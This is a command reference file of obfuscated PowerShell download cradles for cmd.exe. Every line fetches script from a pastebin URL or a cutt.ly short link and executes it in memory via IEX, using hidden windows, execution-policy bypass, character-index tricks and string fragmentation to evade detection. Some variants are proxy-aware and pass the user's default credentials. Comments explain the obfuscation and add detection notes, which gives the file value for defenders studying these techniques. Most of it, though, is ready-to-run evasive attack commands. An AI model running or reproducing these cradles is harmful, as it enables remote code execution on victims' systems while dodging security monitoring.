Download-Cradles.cmd
# Download cradles that are not proxy aware and can be executed in a Windows Command Shell (cmd.exe)
# Windows Command Shell download cradles, not proxy aware, lightly obfuscated
# What each line in this group does: PowerShell creates a Net.WebClient, fetches the text at the
# URL with DownloadString and passes it to IEX (Invoke-Expression), so the fetched text is run as
# script. Nothing in these command lines writes that text to a file.
# The option names are abbreviated and mixed-case. PowerShell matches them case-insensitively and
# by prefix: -nopROfi is -NoProfile, -EXe byPAsS is -ExecutionPolicy Bypass, -wiNDOwsTy HIDdEN is
# -WindowStyle Hidden and -cOMMA is -Command.
# Detection note: compare process command lines case-insensitively and on option prefixes rather
# than on the full literal option names.
cmd> c:\WInDowS\sySTEM32\cmD.eXE /c PoWErSheLl -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA "IEX (New-Object Net.Webclient).downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
cmd> PoWErSheLl -nopROfi -EXe byPAsS -wiNdOwsTy HIDdEN -cOMMA "IEX (New-Object Net.Webclient).downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
# The next line additionally breaks up IEX, New-Object, Net.WebClient and DownloadString with
# backticks (PowerShell's escape character), so none of those names appears as one contiguous
# string in the process command line.
# Detection note: remove backticks before string matching. Where PowerShell script block logging
# (event ID 4104) is enabled, the text handed to IEX is recorded as a script block of its own.
cmd> POWErshelL -NoPRofi -WiNdoWSTYL hidd -EXecUTiOnPO BYpASS -cO "i`EX ( neW-o`BJE`cT N`ET.`weBcl`IeNT ).\"do`wnLO`ADS`TRinG\"( \"https://pastebin.com/raw/88SGrHVh\" )"
# Windows Command Shell download cradles, not proxy aware, obfuscated
# In the first two lines the downloaded string is piped to a command whose name is built at run
# time: ([String]''.Chars)[15,18,19]-Join'' picks three characters out of the text form of a .NET
# member. NOTE(review): on Windows PowerShell these indexes appear to spell "iex"; confirm in a lab.
# The literal strings IEX and Invoke-Expression are therefore absent from these two command lines.
cmd> c:\wiNdoWs\sysTEM32\CmD /c pOWeRsheLl -WiNDOW HIddEN -eXECUTI BYpaSS -nop -CoMmanD "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')"
cmd> pOWeRshell -WiNDOW HIddEN -eXECUTI BYpaSS -nop -CoMmanD "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')"
# The next two lines keep the URL, the type name and the method name in variables and call the
# method through .Invoke(); the result goes to Invoke-Expression (first line) or IEX (second line).
cmd> pOWERShELl -NopROFi -wIN hidd -EXEcutiOnPoLiC BYpAsS -COm "$url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';$wc.$ds.Invoke($url)|Invoke-Expression"
cmd> POWERShelL -W hId -eXECuTionpoLIC BYPaSS -NOprOfiLe -cOmMA "$url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';IEX($wc.$ds.Invoke($url))"
# The last two lines pass only a -Command abbreviation: no -WindowStyle, -ExecutionPolicy or
# -NoProfile option is present. Detection note: a rule that requires those options will not match
# them; key on the WebClient download combined with dynamic invocation instead.
# The first of the two uses DownloadData and joins the bytes as characters instead of calling
# DownloadString, and builds the invoked command name from ([String]''.Normalize)[23,15,46].
# The second splits names with backticks and splits the URL scheme as "ht"+"tps://", so "https://"
# is not contiguous in the command line.
cmd> POWeRsHeLl -cO "&( ([String]''.Normalize)[23,15,46]-Join'')(([Char[]](New-Object Net.WebClient).DownloadData('https://pastebin.com/raw/88SGrHVh'))-Join'')"
cmd> POWerSHElL -CommA "i`Ex ( nE`w-`ObJect Ne`T.WEBCl`Ient ).\"DowNlo`Ads`TRI`NG\"( \"ht\"+\"tps://pastebin.com/raw/88SGrHVh\" )"
# Proxy aware download cradles, which can be executed in a Windows Command Shell (cmd.exe)
# Info: I use a shortened link that redirects to the raw link of the payload hosted on GitHub
# For example, https://cutt.ly/syFzILH redirects to the raw link of a hosted payload on GitHub
# NOTE(review): the two commands in this group use the pastebin URL directly, not the short link.
# Windows Command Shell download cradles, proxy aware, lightly obfuscated
# What makes these lines proxy aware: the WebClient's proxy is set from
# [Net.WebRequest]::GetSystemWebProxy() and its proxy credentials from
# [Net.CredentialCache]::DefaultCredentials, i.e. the credentials of the security context the
# process runs in. The downloaded string is then passed to iex.
# Detection note: on an authenticating proxy the request is attributable to that account. These
# lines set no User-Agent header on the WebClient.
# In the first line there is no space between /c and the PowerShell token, so a parser that splits
# the command line on whitespace sees "/cPowErShell" as a single token.
cmd> c:\wInDOwS\sysTem32\CmD /cPowErShell -wINdowstYL Hi -nop -eXecU ByPAss -COm "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $c.downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
cmd> PowErShell -wINdOwstYL Hi -nop -eXecU BYpAss -COm "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $c.downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
# Windows Command Shell download cradles, proxy aware, heavily obfuscated
# The first line sets the system proxy and default credentials on the WebClient before the
# download. It writes iex with backticks, splits the URL scheme as "ht"+"tps://", and has no
# space between /c and the PowerShell token.
cmd> C:\WINdOWS\SySteM32\CmD.EXe /cpOWershEll -eXecut byPaSS -Noprof -w H -Co "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;`i`e`x $c.downloadstring(\"ht\"+\"tps://pastebin.com/raw/88SGrHVh\")"
# The second line assembles the whole script from concatenated string fragments. The -F format
# operator then fills {0}, {1} and {2} with [char]96 (backtick), [char]34 (double quote) and
# [char]36 (dollar sign). The resulting string is invoked with & through a command name built from
# (Variable '*mdr*').Name[3,11,2].
# NOTE(review): presumably the MaximumDriveCount variable of Windows PowerShell, giving "iex"; confirm.
# -WINDo 1 gives the window style as a number (1 is Hidden in System.Diagnostics.ProcessWindowStyle).
# This is the only line in the file whose URL is the cutt.ly short link, itself split across
# fragments, so the command line names only the shortener and not the final host.
# Detection note: literal matching on the command line finds neither "webclient", "downloadstring"
# nor the URL. Rely on script block logging / AMSI content and on proxy or DNS records for the
# shortener and its redirect target.
cmd> poWershELl -eXecUT byPAss -WINDo 1 -nOpR -coMm "& ((vARiaBlE '*mdr*').Name[3,11,2]-JoiN'') ((('{2}c=new-obj'+'ect ne'+'t.'+'webclient;{2'+'}'+'c.p'+'roxy='+'[Net'+'.'+'WebR'+'equest]::'+'GetS'+'yst'+'emWebP'+'ro'+'x'+'y();{'+'2}c'+'.Pr'+'oxy.Cre'+'dentials=[Net'+'.Cr'+'edentialC'+'ache]::D'+'e'+'fau'+'l'+'tCredenti'+'als'+';{0}i{0}e'+'{0}x {'+'2}c.downl'+'oa'+'ds'+'t'+'ring({1}ht{1}+{1'+'}t'+'ps'+':'+'/'+'/'+'cutt.ly/syFzIL'+'H{1})') -F [cHAR]96,[cHAR]34,[cHAR]36))"